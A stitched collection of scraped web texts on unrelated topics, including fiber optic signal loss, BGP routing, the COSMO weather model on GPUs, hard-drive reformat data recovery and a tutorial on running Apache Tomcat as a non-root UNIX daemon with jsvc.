Join the CIO Australia group on LinkedIn. The group is open to CIOs, IT Directors, COOs, CTOs and senior IT managers. | <urn:uuid:de625e93-497e-4443-a58d-9fca7f4bc9b1> | CC-MAIN-2017-04 | https://www.cio.com.au/article/401353/how_define_scope_project/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00324-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.918234 | 773 | 2.984375 | 3 |
There is no similiarity either. It is more like a cause and effect system.
Dialog design is used to form a dialog flow between two procedures or procsteps.
A tool in the Design Toolset that is used during External Design to produce Dialog Flow Diagrams. It automates the representation of the steps within a dialog and illustrates their sequence.
The transfer of control, and possibly data, between procedure steps in the same generated business system (internal flows) or between procedure steps in different business systems (external flows). There are two types of dialog flows: links and transfers.
Dialog design is the process to create dialog flows. | <urn:uuid:a4df4763-2e50-44c7-bf43-caa2cc1be283> | CC-MAIN-2017-04 | http://ibmmainframes.com/about31044.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00352-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933378 | 132 | 2.703125 | 3 |
Arizona State University, like many colleges across the United States, has a problem with students who enter their freshman year ill prepared in math. Though the school offers remedial classes, one-third of students earn less than a C, a key predictor that they will leave before getting a degree. To improve the dismal situation, ASU turned to adaptive-learning software by Knewton, a prominent edtech company. The result: pass rates zipped up from 64% to 75% between 2009 and 2011, and dropout rates were cut in half.
But imagine the underside to this seeming success story. What if the data collected by the software never disappeared and the fact that one had needed to take remedial classes became part of a student’s permanent record, accessible decades later? Consider if the technical system made predictions that tried to improve the school’s success rate not by pushing students to excel, but by pushing them out, in order to inflate the overall grade average of students who remained.
These sorts of scenarios are extremely possible. Some educational reformers advocate for “digital backpacks” that would have students carry their electronic transcripts with them throughout their schooling. And adaptive-learning algorithms are a spooky art. Khan Academy’s “dean of analytics,” Jace Kohlmeier, raises a conundrum with “domain learning curves” to identify what students know. “We could raise the average accuracy for the more experienced end of a learning curve just by frustrating weaker learners early on and causing them to quit,” he explains, “but that hardly seems like the thing to do!” | <urn:uuid:74393f2d-f35c-4c40-8484-610b4ee6ce84> | CC-MAIN-2017-04 | http://www.nextgov.com/big-data/2014/03/how-big-data-will-haunt-you-forever-your-high-school-transcript/80266/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00352-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.972681 | 337 | 3.125 | 3 |
The Donald Danforth Plant Science Center is a not-for-profit scientific facility located in Creve Coeur, Missouri, United States. The Center's mission is to "improve the human condition through plant science".Founded in 1998 by William Henry Danforth, a cardiologist, the Center was established through a $60 million gift from the Danforth Foundation, a $50 million gift from the Monsanto Fund, the donation of 40 acres of land from Monsanto, and $25 million in tax credits from the State of Missouri. Wikipedia.
Umen J.G.,Donald Danforth Plant Science Center
Current Opinion in Microbiology | Year: 2011
Sexual reproduction in Volvocine algae coevolved with the acquisition of multicellularity. Unicellular genera such as Chlamydomonas and small colonial genera from this group have classical mating types with equal-sized gametes, while larger multicellular genera such as Volvox have differentiated males and females that produce sperm and eggs respectively. Newly available sequence from the Volvox and Chlamydomonas genomes and mating loci open up the potential to investigate how sex-determining regions co-evolve with major changes in development and sexual reproduction. The expanded size and sequence divergence between the male and female haplotypes of the Volvox mating locus (MT) not only provide insights into how the colonial Volvocine algae might have evolved sexual dimorphism, but also raise questions about why the putative ancestral-like MT locus in Chlamydomonas shows less divergence between haplotypes than expected. © 2011 Elsevier Ltd. Source
Donald Danforth Plant Science Center | Date: 2015-09-10
Provided are transgenic plants expressing KP6 antifungal protein and/or KP6 and polypeptides, exhibiting high levels of fungal resistance. Such transgenic plants contain a recombinant DNA construct comprising a heterologous signal peptide sequence operably linked to a nucleic acid sequence encoding these molecules. Also provided are methods of producing such plants, methods of protecting plants against fungal infection and damage, as well as compositions that can be applied to the locus of plants, comprising microorganisms expressing these molecules, or these molecules themselves, as well as pharmaceutical compositions containing these molecules. Human and veterinary therapeutic use of KP6 antifungal protein and/or KP6 and polypeptides are also encompassed by the invention.
Donald Danforth Plant Science Center | Date: 2012-03-26
DNA constructions that provide for production of potent antifungal proteins in transgenic plants and transformed yeast cells are described. Methods of using the DNA constructs to produce transgenic plants that inhibit growth of plant pathogenic fungi are also disclosed. The use of transformed yeast cells containing the DNA constructs to produce the antifungal proteins and methods of isolating the antifungal proteins are also described.
Donald Danforth Plant Science Center | Date: 2013-05-13
Provided are enhanced high yield production systems for producing terpenes in plants via the expression of fusion proteins comprising various combinations of geranyl diphosphate synthase large and small subunits and limonene synthases. Also provided are engineered oilseed plants that accumulate monoterpene and sesquiterpene hydrocarbons in their seeds, as well as methods for producing such plants, providing a system for rapidly engineering oilseed crop production platforms for terpene-based biofuels.
Donald Danforth Plant Science Center and University of Missouri | Date: 2015-09-25
Provided are plants that express, or overexpress, a pPLAIII protein. Constitutive or seed-specific expression of pPLAIII protein in | <urn:uuid:d616ab98-4b1b-4920-b1e4-404297e88986> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/donald-danforth-plant-science-center-22157/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00352-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.91011 | 771 | 2.8125 | 3 |
Fiber optic transmission has various advantages over other transmission methods like copper or radio transmission. Fiber optic which is lighter, smaller and more flexible than copper can transmit signals with faster speed over longer distance. However, many factors can influence the performance of fiber optic. To ensure the nice and stable performance of the fiber optic, many issues are to be considered. Fiber optic loss is a negligible issue among them, and it has been a top priority for many engineers to consider during selecting and handling fiber optic. This article will offer detailed information of fiber optic loss.
When a beam of light which carrying signals travels through the core of fiber optic, the strength of the light will become lower. Thus, the signal strength becomes weaker. This loss of light power is generally called fiber optic loss or attenuation. This decrease in power level is described in dB. During the transmission, something be happened and causes the fiber optic loss. To transmit optical signals smoothly and safely, fiber optic loss must be decreased. The cause of fiber optic loss located on two aspects: internal reasons and external causes of fiber optic, which are also known as intrinsic fiber core attenuation and extrinsic fiber attenuation.
Internal reasons of fiber optic loss caused by the fiber optic itself, which is also usually called intrinsic attenuation. There are two main causes of intrinsic attenuation. One is light absorption and the other one is scattering.
Light absorption is a major cause of fiber optic loss during optical transmission. The light is absorbed in the fiber by the materials of fiber optic. Thus light absorption is also known as material absorption. Actually the light power is absorbed and transferred into other forms of energy like heat, due to molecular resonance and wavelength impurities. Atomic structure is in any pure material and they absorb selective wavelengths of radiation. It is impossible to manufacture materials that are total pure. Thus, fiber optic manufacturers choose to dope germanium and other materials with pure silica to optimize the fiber optic core performance.
Scattering is another major cause for fiber optic loss. It refers to the scattering of light caused by molecular level irregularities in the glass structure. When the scattering happens, the light energy is scattered in all direction. Some of them is keeping traveling in the forward direction. And the light not scattered in the forward direction will be lost in the fiber optic link as shown in the following picture. Thus, to reduce fiber optic loss caused by scattering, the imperfections of the fiber optic core should be removed, and the fiber optic coating and extrusion should be carefully controlled.
Intrinsic fiber core attenuation including light absorption and scattering is just one aspect of the cause in fiber optic loss. Extrinsic fiber attenuation is also very important, which are usually caused by improper handling of fiber optic. There are two main types of extrinsic fiber attenuation: bend loss and splicing loss.
Bend loss is the common problems that can cause fiber optic loss generated by improper fiber optic handling. Literally, it is caused by fiber optic bend. There are two basic types. One is micro bending, and the other one is macro bending (shown in the above picture). Macro bending refers to a large bend in the fiber (with more than a 2 mm radius). To reduce fiber optic loss, the following causes of bend loss should be noted:
fiber optic splicing is another main causes of extrinsic fiber attenuation. It is inevitable to connect one fiber optic to another in fiber optic network. The fiber optic loss caused by splicing cannot be avoided, but it can be reduced to minimum with proper handling. Using fiber optic connectors of high quality and fusion splicing can help to reduce the fiber optic loss effectively.
The above picture shows the main causes of loss in fiber optic, which come in different types. To reduce the intrinsic fiber core attenuation, selecting the proper fiber optic and optical components is necessary. To decrease extrinsic fiber attenuation to minimum, the proper handling and skills should be applied. | <urn:uuid:802692e2-8eab-4e0b-8fba-2a96eb55d48b> | CC-MAIN-2017-04 | http://www.fs.com/blog/understanding-loss-in-fiber-optic.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00562-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.94572 | 807 | 3.421875 | 3 |
BGP is the Internet routing protocol. He is making the Internet work.
BGP protocol performs actions by maintaining IP networks table for the biggest network in the world – The Internet. The BGP protocol, as a code of behavior, supported core routing decisions over the Internet. Instead of using traditional IGP (Interior Gateway Protocol) metrics, BGP protocol relies upon available path, network guidelines and rule-sets for routing decision making purposes. And just for this feature, it is sometimes expressed as a reachability protocol. The main idea behind the BGP creation was to replace the EGP (Exterior Gateway Protocol) to permit a complete decentralized routing. NSFNET backbone is the best example of a decentralized system.
BGP protocol enables the Internet to act as a truly decentralized network system. All older BGP versions before version 4 have been obsolete. Main reason of BGP version 4 consistent utilization is its support for classless inter domain route finding. This protocol also uses route aggregation to reduce the routing table size.
What BGP does?
- best possible routing path’s determination
- Information cluster transportation, in packets form, over the internetwork. This method of packets transportation is relatively straightforward, when you will compare it to complex path determination method.
The Border Gateway Protocol basically runs best-path determination within networks. Therefore, the role of BGP in TCP/IP networks is to perform interdomain routing. This protocol works as an exterior gateway protocol, which is used to carry out routing between several self-directed domains and to swap the routing information amongst those systems. It connects almost all networks in the world into the biggest worlds network – Internet. Soon after BGP introduction, the Exterior Gateway Protocol (EGP) was outdated. BGP resolved those serious problems that were attached with EGP and provided the stability to Internet development.
BGP descriptions are available in several RFCs such as in RFC 1771, which describes the up to date version of BGP, named BGP 4. Moreover, RFC 1654 is expressed the 1st specification of BGP while RFCs 1105, 1163, and 1267 are specifying those BGP versions which where actual before BGP version 4. But from 2006, BGP version 4 specification is available in RFC 4271 form.
BGP Routing Processes
BGP can perform three different types of routing. These types are mentioned below as:
- Inter-autonomous system type routing is possible either between two or more BGP routers which are on different ASs. Moreover, internetwork topology’s consistent view can be achieved by peering routers with BGP. BGP main function is to supply optimal routes within the Internet by doing path determination.
- Intra-autonomous system type routing is required for a consistent system topology view. It is the function of BGP to decide, which routes should be advertised to outside ASs.
- Pass-through autonomous system type routing can take place between two or more BGP routers so that networks traffic can be exchanged across autonomous systems.
BGP Packet Header Layout
BGP packet header is to be made of four parts: Marker (16 bytes in length), Length (2 bytes), Type (1 byte) and Data field of variable length. | <urn:uuid:431cf325-b71f-478a-bbf0-d334cc2d050e> | CC-MAIN-2017-04 | https://howdoesinternetwork.com/2012/bgp | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00104-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.908463 | 673 | 3.8125 | 4 |
When Piz Daint – the Cray supercomputer installed at the Swiss National Supercomputing Center (CSCS) – was first announced, the project leaders cited the benefits for COSMO, an atmospheric model used by the German Meteorological Service, MeteoSwiss and other institutions for their daily weather forecasts. The COSMO model is maintained by the Consortium for Small-scale Modeling (aka COSMO), a group of seven national weather services.
A recent article at Swiss HPC provider community hpc-ch provides an in-depth look at recent developments with the COSMO application, including how it is being modified to take advantage of hardware accelerators, like GPGPUs.
Over the past three years, researchers from the Center for Climate Systems Modeling and MeteoSwiss have been revising and refining the COSMO model’s code and the algorithms it employs as part of their work with the High Performance and High Productivity Computing (HP2C) initiative. The main goals of this project were to make the software more efficient and to adapt it to leverage the performance gains offered by hybrid GPU-based computing systems. The code was tested successfully on Piz Daint, a Cray system that derives its FLOPS from both CPUs and GPUs. In September the group reported that the simulations performed with greater efficiency and also enabled reduced energy consumption.
Because of these promising results, the Steering Committee of the COSMO Consortium has decided to fully support the new developments in the official version. This means that a GPU-friendly version will be distributed to all users of the COSMO model. Oliver Fuhrer, a senior scientists with MetoSwiss who worked on the code changes, provides additional details about the benefits of GPU-based computing platforms and the significance of the changes.
Fuhrer notes that the integration project will prove a little challenging since the “official” model has also undergone some development work since the start of the HP2C projects – so the new version will need to incorporate both sets of changes. It’s a “strict” process that will require some code refactoring and a lot of testing, according to Fuhrer.
Fuhrer also explains that the two HP2C projects illustrated three important points:
Firstly, it is feasible to target GPU-based hardware while retaining a single source code for almost all of the COSMO code. Secondly, using GPU hardware is very attractive for accelerating simulation time and reducing the electric power required to run the computer executing the simulation. Thirdly, it is possible for domain scientists to develop and work with this new version of the COSMO model.
Even though it’s a lot of work to make the changes, the efficiency gains and power consumption benefits are a compelling case, especially given the still-expanding popularity of GPUs in big science systems. The upgraded Piz Daint supercomputer, which is coming online this November at CSCS, will use an equal number of CPUs and GPUs. “Applications that can also be run on GPUs will have unprecedented compute power available [to them],” says Fuhrer. | <urn:uuid:dfc9e8c6-f90f-4e92-bed0-5822d53dae7c> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/10/25/scientists-prepare-weather-model-gpu-based-systems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00491-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9427 | 654 | 2.703125 | 3 |
When you reformat a hard drive, it may seem like you’ve erased all of the data on it for good. The good news is that your data isn’t gone forever—it’s just become inaccessible to you. If you’ve accidentally reformatted your hard drive and lost critical data, Gillware’s accidental reformat data recovery services can reunite you with your lost files.
What Happens When You Quick Format a Hard Drive?
Every data storage device you’ve ever used has been formatted at least once. Formatting is a procedure that simply applies a filesystem to the device. Without a filesystem, whatever operating system you use on your computer would not be able to read your hard drive, USB flash drive, or solid state drive. Without a filesystem, you just have a useless hunk of metal and plastic attached to your computer.
There are many different kinds of filesystems. Windows uses NTFS, Mac uses HFS+, Linux uses a whole bunch of different file systems (like Ext3, ZFS, etc.). A USB flash drive and some older external hard drives will be formatted with FAT16 or FAT32. These file systems all seem to work the same way to the end user. But all of them function differently and have a lot of unique features. And some of them don’t play well with each other.
For example, if you plug the 4TB Western Digital My Book you use with your Macbook Pro into your Windows 10 PC, Windows will tell you the drive is blank and ask you if you want to format it! If you’re caught off-guard, you might accidentally reformat your My Book. Before you can stop it, your iPhoto library and all the documents you’ve stored on the external device will have vanished.
In other cases, if a hard drive is having trouble with its physical components or firmware, your computer may prompt you to format it. Your computer doesn’t know why it can’t communicate with the hard drive. All it knows is that the hard drive looks blank to it, and it needs to format a blank drive before it can start using it.
Formatting and reformatting a hard drive is a big deal to you and your computer. You press the “Okay” button, wait a few seconds or maybe a minute (depending on the capacity of your device), and presto, your entire hard drive is blank. But in reality, you’ve only made a small change to the drive.
At the “front end” of your hard drive (actually, the sector on the platters marked as sector 0) is a partition table. This table keeps track of how many partitions have been created on the hard drive and points to their superblocks. These superblocks, in turn, define where the partitions begin, how big they are, and where they keep their records of all the files inside their partitions.
What exactly happens when you quick format your hard drive? The hard drive doesn’t immediately go through and start changing every binary bit on the drive to a 0. Instead, it writes over only a tiny bit of data. All your computer needs to do is change the data on the partition table and make a new superblock for the new partition. It also writes a little bit more data to the hard drive, but this data is invisible to the average user.
Let’s say you pull out your PC’s hard drive, plug it in to a different computer, and make a quick reformat. Here’s a simple “stick figure” drawing of what it might look like before you reformat it. There’s a little system partition at the beginning, then the partition containing your operating system. At the end is a partition you just put assorted files on:
Here’s what your hard drive’s geometry looks like after you quick format the drive:
There’s a new superblock defining a partition that starts near the front of the drive and spans all the way to the end. There’s also a new set of file definitions as well. There aren’t very many new files to define, though.
Some of the data was overwritten. But for the most part, the quick format operation didn’t actually do anything to the vast majority of the data on the hard drive. It just told your hard drive to ignore it and pretend the new partition is empty.
Now, if a significant amount of data is written to the hard drive after the accidental reformat, that’s a different story. This can drastically affect the results of our accidental reformat data recovery efforts. When new data is written to a hard drive, there’s no telling how much of it is going to land on top of the old data and how much will settle safely in the empty nooks and crannies around it instead. If you’ve accidentally reformatted your hard drive, the best thing you can do is stop using it as quickly as possible.
As you continue to use a hard drive that has been reformatted, new data starts to overwrite the old data.
How Do Gillware’s Accidental Reformat Data Recovery Services Work?
There are many software data recovery tools that promise to get your data back after you’ve accidentally reformatted your hard drive. These tools aren’t very robust. Some of them outright don’t work. For example, let’s go back to the first chart and say that the second partition in the old geometry starts at sector 3,000,000. In that partition’s file definitions, it identifies a Microsoft Word document that says it starts at sector 1,000.
A lazier software data recovery tool might not recognize that the file starts 1,000 sectors after the beginning of this partition (so, actually, sector 3,001,000). The tool will go back to sector 1,000 (way back in the first partition) and try to dig up a file that isn’t there.
Our data recovery experts at Gillware use our custom data recovery software, HOMBRE. HOMBRE was developed for our data recovery engineers, by our data recovery engineers. It’s a well-crafted piece of software that gives our technicians a bounty of powerful data recovery tools at their disposal.
The first thing our data recovery engineers do is make a complete, write-blocked forensic image of the reformatted hard drive. HOMBRE will scan through the entire contents of the hard drive to pick up as much metadata as it can to aid our technicians. In many accidental reformat data recovery scenarios, the old superblocks haven’t been overwritten. Or if they have, the backup superblocks are often still competely intact and can be used to uncover the hard drive’s old filesystem geometry.
In an ideal situation, the hard drive hasn’t been used at all since it was accidentally reformatted. But sometimes new data gets written to the drive. These can be inadvertently-created backup files or an entire operating system that has been newly installed to the drive. Any data written to a freshly-formatted hard drive compromises the integrity of the data on the drive. The old file definitions could point to the location of a file that has been partially or completely overwritten by new data.
HOMBRE provides our engineers with tools for this scenario, as well. Although data that has been overwritten cannot be restored, our engineers can use HOMBRE to aid in identifying file corruption and accurately determining the quality of our data recovery efforts.
Why Choose Gillware for My Accidental Reformat Data Recovery Needs?
At Gillware, we offer financially risk-free data recovery evaluations with no upfront costs. We can even provide a prepaid shipping label to cover the cost of shipping your hard drive to us. Our engineers evaluate the status of your hard drive and give you a price quote for our data recovery efforts. We only go ahead with the recovery if you are comfortable with the price quote, and don’t ask for payment until we’ve recovered your critical data.
Our data recovery technicians are world-class and have solved thousands of accidental reformat data recovery situations just like yours. Your data is in good hands at Gillware Data Recovery.
Ready to Have Gillware Assist You with Your Accidental Reformat Data Recovery Needs?
Best-in-class engineering and software development staff
Gillware employs a full time staff of electrical engineers, mechanical engineers, computer scientists and software developers to handle the most complex data recovery situations and data solutions
Strategic partnerships with leading technology companies
Gillware is proud to be a recommended provider for Dell, Western Digital and other major hardware and software vendors. These partnerships allow us to gain unique insight into recovering from these devices.
RAID Array / NAS / SAN data recovery
Using advanced engineering techniques, we can recover data from large capacity, enterprise grade storage devices such as RAID arrays, network attached storage (NAS) devices and storage area network (SAN) devices.
Virtual machine data recovery
Thanks to special engineering and programming efforts, Gillware is able to recover data from virtualized environments with a high degree of success.
SOC 2 Type II audited
Gillware has been security audited to ensure data safety, meaning all our facilities, networks, policies and practices have been independently reviewed and determined as completely secure.
Facility and staff
Gillware’s facilities meet the SOC 2 Type II audit requirements for security to prevent entry by unauthorized personnel. All staff are pre-screened, background checked and fully instructed in the security protocol of the company.
We are a GSA contract holder.
We meet the criteria to be approved for use by government agencies
GSA Contract No.: GS-35F-0547W
Our entire data recovery process can be handled to meet HIPAA requirements for encryption, transfer and protection of e-PHI.
No obligation, no up-front fees, free inbound shipping and no-cost evaluations.
Gillware’s data recovery process is 100% financially risk free. We only charge if the data you want is successfully recovered.
Our pricing is 40-50% less than our competition.
By using cutting edge engineering techniques, we are able to control costs and keep data recovery prices low.
Instant online estimates.
By providing us with some basic information about your case, we can give you an idea of how much it will cost before you proceed with the recovery.
We only charge for successful data recovery efforts.
We work with you to define clear data recovery goals for our technicians, and only charge you upon successfully meeting these goals and recovering the data that is most important to you.
Gillware is trusted, reviewed and certified
Gillware has the seal of approval from a number of different independent review organizations, including SOC 2 Type II audit status, so our customers can be sure they’re getting the best data recovery service possible.
Gillware is a proud member of IDEMA and the Apple Consultants Network. | <urn:uuid:9b9841d2-f6b7-4b38-9025-93af11abd31a> | CC-MAIN-2017-04 | https://www.gillware.com/accidental-reformat-data-recovery/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00399-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.917646 | 2,307 | 2.515625 | 3 |
Apache Tomcat is a server of web applications primarily used in commercial environment not only as an application platform, but also as a component of large projects related with providing of a web-interface. In corporate sector, security of information systems has the highest priority, while infrastructure stability ensures failure-free operation. Let us test a vaunted stability and security of UNIX daemons taking Tomcat as an example.
Historically, it has become a conventional practice to perform settings with root privileges, to work — with non-root, and if these activities are mixed we get a rap on the knuckles. Everyone who has read even one book on *nix remembers by heart the author’s instruction — not to work with root rights and to do away with the habit to configure the system immediately upon installation, prior to creating an account, at least, with access to wheel group. This is really a bad habit with far-reaching consequences. Having looked into the world of MS Windows, we chuckled at admins and regular users with unlimited rights. As if they were experts sitting in front of unlocked doors that lead to the very core of the system.
As time passes, applications become larger but appetite grows, too. Hardware gets more portable and sleek, holding not these applications only but also various means of protection against malware and other threats, which are no less various. Look! The development, implementation, and operation have become an industry, an extremely profitable industry. It’s hard to imagine an enterprise not using commercial proposals. These proposals keep getting more complicated, more reliable and smart. The whole niches of corporate developments have emerged, and it has become incredibly difficult to do without them. Try, e.g., to give up remote access to corporate mail, or leave your laptop at home, with so convenient calendar and a tunnel to your work files.
Probably, httpd is the most popular product of Apache community, the product’s name being the same, apache, until version 2. At present, web server working in the background and dealing with thousands of parallel sessions is only used academically, for backward compatibility, and simply because of nostalgia. The Apache community keeps living and demonstrating ever new technologies, applications, and solutions to the world. We are going to deal with one of these miracles now.
Find yourself a cat
Developers of Java applications are familiar with Tomcat server, and appropriate qualification in dealing with it has become a requirement for many work positions. An admin knowing this server can find a fairly good position and earn his/her bread and butter without much effort. Developers of very large software systems also keep the cat. Sometimes, these software systems work hard for many thousands (and maybe even millions) of people while the cat silently provides a web interface of management. In fine, cats are useful animals.
But has everyone looked into the cat’s environment? If many of us ever pay attention to the area where it is allowed to walk, or the food left for it to smell, and if the noble animal is allowed to let drop all pots with plants?
But we will leave metaphors and study the privileges assigned to our container with servlets. I have never happened to see more than starting server through /bin/su tomcat $CATALINA_HOME/bin/startup.sh. Yes, a tomcat user has been created; yes, a directory has been assigned owner rights, but are these the things that Linux/UNIX world is capable of providing to us? Not for sure. Consider a special case of starting, when a process and hence, all its children and threads are started with root privileges. What are the dangers here? Here ‘s the list:
- A hypothetical intruder can make use of any vulnerability of library, class, or program code. With root privileges, a trouble is inevitable.
- A similar trouble but now with respect to code, libraries, and classes of the server. It can be traced by changelog of the release.
- A bug in a code or algorithm may prove to be quite expensive, if performed with root privileges.
- An error in the application design can block a shared resource.
People do make mistakes and we are going to eliminate them through the mechanisms which lay the foundation of modern multi-user operating systems. We shall begin with the meaning of isolation of a server process and transforming it into a real daemon.
How does it function?
We have been remembering potential dangers of starting the daemon with root privileges since the time of the above-mentioned httpd: these are: unauthorized access to files (especially with Perl) and transition one-two levels higher than DocumentRoot, with SQL injections being a separate branch of science, even with their professors. And now, two questions and two answers:
- What way has been selected by the developers of httpd, MySQL, PostgreSQL, and other products? The answer: they have disabled root privileges of the above-listed processes.
- What shall be done if we really need these privileges for system calls, direct access to the core and its resources? We do need an open port. The answer: there are several mechanisms, e.g., notorious SUID or weakening privileges through
Let’s have a look at process status display (Fig. 1).
These are the processes at the state of execution. The ‘master’ process has initiated five processes, made them the owners of a system owner ‘nobody’, unstuck them from a terminal by redirecting output to log, and opened port for them (by default, port 80). With this, we can be sure that a directory where the process is being performed is not a root directory (
/), and no one will be able to log in as user ‘nobody’. You see that the basics of isolation in the system are met.
Now, we examine a modified output (Fig.2).
How do I know that these are child processes? By PPID. Everything is in compliance with the rules: master process has PPID 1; so, it is clear that it has been initiated by init, while all others have PPID = PID of master process.
Most daemons not only create child processes but also distribute load over them, transfer logs to syslogd daemon, and perform other useful work. In general, we can transfer any signals to daemon similar to any other process, e.g., SIGHUP, via reload in initialization script. This is useful under heavy loads when restarting the process, in order to apply a new config file, can take too much time, thus interrupting a lot of sessions. We can use signal SIGSTOP to pause, then continue again (SIGCONT).
Working with commercial applications, I have noticed that even large companies — industry leaders do not pay attention to decrease in privileges and leave root privileges to a Tomcat owner. Let us discuss how to eliminate these problems.
Let me introduce — jsvc
Apache Commons project has developed jsvc utility, its source code being delivered together with Tomcat distribution software. The purpose of this development: performing a number of actions which would result in transformation of Tomcat into a UNIX daemon. Jsvc can change UID of a child process via fork(), hibernate a parent process, divide standard output and error flows, accept standard Java options, accept Java machine options, process code and system assertions, and do many other things, the whole list being accessible by
In order to have a complete experience, we will assemble the project manually, though, e.g., in CentOS base there is an implementation (no the latest one) with a code name jakarta-commons-daemon-jsvc, described as Java daemon launcher. Now, to the point. We’ll need ‘make’ and GCC. Go down to
$CATALINA_HOME/bin/ and unpack commons-daemon-native.tar.gz archive, going to unix directory:
$ tar xzvf commons-daemon-native.tar.gz ; cd commons-daemon-1.0.10-native-src/unix/
Installation docs say that for compilation it is sufficient to make a simple link
./configure ; make ; cp jsvc ../.. ; cd ../.., but I’d like to supplement the information with my own findings upon thorough study of
./configure file. The information is useful and gentoo professionals will appreciate it.
First, make sure to specify, when assembling,
JAVA_HOME is path to the directory with JDK. As far as I could understand, this option statically fixes path to JAVA; if you are going to assemble for a specific server, the path will be taken from a constant in the code, instead of applying an environment variable. Second, it is desirable to specify
-with-os-type=linux; this option could have been left undescribed, its word-for-word meaning is clear. The value is the name of directory
JAVA_HOME/include/<OS_for_which_JDK_was_built>; in the compilation process, it is possible to eliminate the Sun-specific data types. Well, third, the values of GCC options
CFLAGS=-m64 LDFLAGS=-m64; here, I noticed that the executable file had become about two times smaller. Be careful: these keys make machine-dependent x86-instructions unavailable for the application; so, the software will not start on a 32-bit machine.
In the whole, my configuration string looked as follows:
./configure -with-java=/usr/java/latest -with-os-type=/include/linux CFLAGS=-m64 LDFLAGS=-m64; if you are interested in boosting the application for a specific processor, welcome to Wiki Gentoo. However, it seemed to me that the performance was not so great, taking into account modern capacities.
I’d like to specially note a bug, which I have caught when assembling on CentOS 5, the application version delivered with Tomcat 6. If you do not make clean before make, the assembly barfs to libservice.a. As far as I know, Malformed archive is understood by an earlier version of ar archiver. Using version 2.20, the archive is successfully modified.
As an output, we’ll get a small executable file which will demonize our Thomas (Tomcat). We move it to bin directory and prepare a script to start it up and initialize. In release 7.x, everything turned out to be very easy: Java options are transferred via setenv.sh file, which you must just create and have these options assigned to it (
JAVA_OPTS=”-Xmx2G -Xms1G …”). In the same directory, in bin, there is daemon.sh file; we open it and assign to TOMCAT_USER variable the name of the user to whom the process, e.g., ‘daemon’ will belong to. What is important — this user already exists in the system, and it has /sbin/nologin shell — the same as all special users have who have been created to own background processes. Then, we make a symbolic reference to this file:
$ ll /etc/init.d/tomcatd
lrwxrwxrwx 1 root root 30 Jun 26 13:38 /etc/init.d/tomcatd -> /opt/tomcatd/bin/daemon.sh
For validation, we have used CentOS; therefore, for chkconfig to correctly work with the initialization script, it is necessary to enter, at the beginning of the script, the description of initialization levels and priorities used during start-up and shutdown:
$ head /etc/init.d/tomcatd
# chkconfig: 345 73 21
# description: Tomcat super daemon
Let’s try to start it (Fig. 3).
There is always a chance of deviations from what has been planned. Server starting log is written to catalina-daemon.out. As I have mentioned, errors are written to another file: catalina-daemon.err.
There is a parent process in proc list with root privileges, and also a child one, owned by
daemon. Default shell for this process is /sbin/nologin, so there’s no way to execute anything without direct access to OS core through system calls.
$ su daemon
This account is currently not available.
Eventually, we have obtained a full-featured server of Java applications, launched according to UNIX concept, with the required and sufficient privileges. In the general case, the server follows the scenario:
- It downloads to memory, makes fork(), thus changing the owner of a child process.
- The parent waits for the child response — something like ‘I’m ready’, whereupon it falls waiting through wait_child(), which is classics of the genre.
- The child process is a master similar to that described for nginx. It is this process that activates a Java machine, applies options to it, and performs everything provided by the logic of Tomcat’s operation; then it falls into threads and receives clients’ connections. | <urn:uuid:12ea2c07-5ff8-4ded-ab2e-a9e5e13019c1> | CC-MAIN-2017-04 | https://hackmag.com/devops/making-unix-daemon-from-apache-tomcat/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00307-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.921719 | 2,794 | 2.609375 | 3 |
Collaborating with Environmental Defense Fund to Shrink Our Water Footprint
By: John Schulz, Director, AT&T Sustainability Operations
Compared to other resources, water is relatively cheap, which is ironic considering that we literally can't live without it. It is a critical natural resource to ecological health, community vitality and business operations. As demand for water grows - 40 percent by 2030 by some estimates - and climate change impacts water availability, the financial cost of water will surely change. In the meantime, AT&T is working diligently to insulate our operations from increasing water scarcity and rising water costs. We're focused on reducing our water use today.
We are taking a comprehensive approach to reducing our 3.3 billion gallon water footprint by following a few basic guidelines.
- Think differently about the business case: Because water is so inexpensive today, it is difficult to build a compelling business case for water-efficiency investment. Our challenge is to identify ways to broaden the business case conversation to make it more financially compelling. The connection between water and electricity is fundamental to that thinking.
- Think locally: We evaluated regional differences in order to prioritize action, because compared to other resources and commodities, water is particularly shaped by region. We used tools like the World Business Council for Sustainable Development's Water Tool and others to calculate water scarcity risk at our various facilities. Not only are water-stressed areas in the greatest need, but they also tend to be the most likely to have higher water prices, incentives or pending regulations, all of which impact the business case.
- Think about the big picture: We evaluated how we use water, including some of the "hidden" places it is used. For us, observable water uses such as in bathrooms and landscape irrigation are a smaller percentage of our water use and are relatively expensive to upgrade, making it a more difficult business case. In fact, we found that we would make a more compelling water-efficiency business case by focusing on the water that is intertwined with our energy usage in the building cooling process.
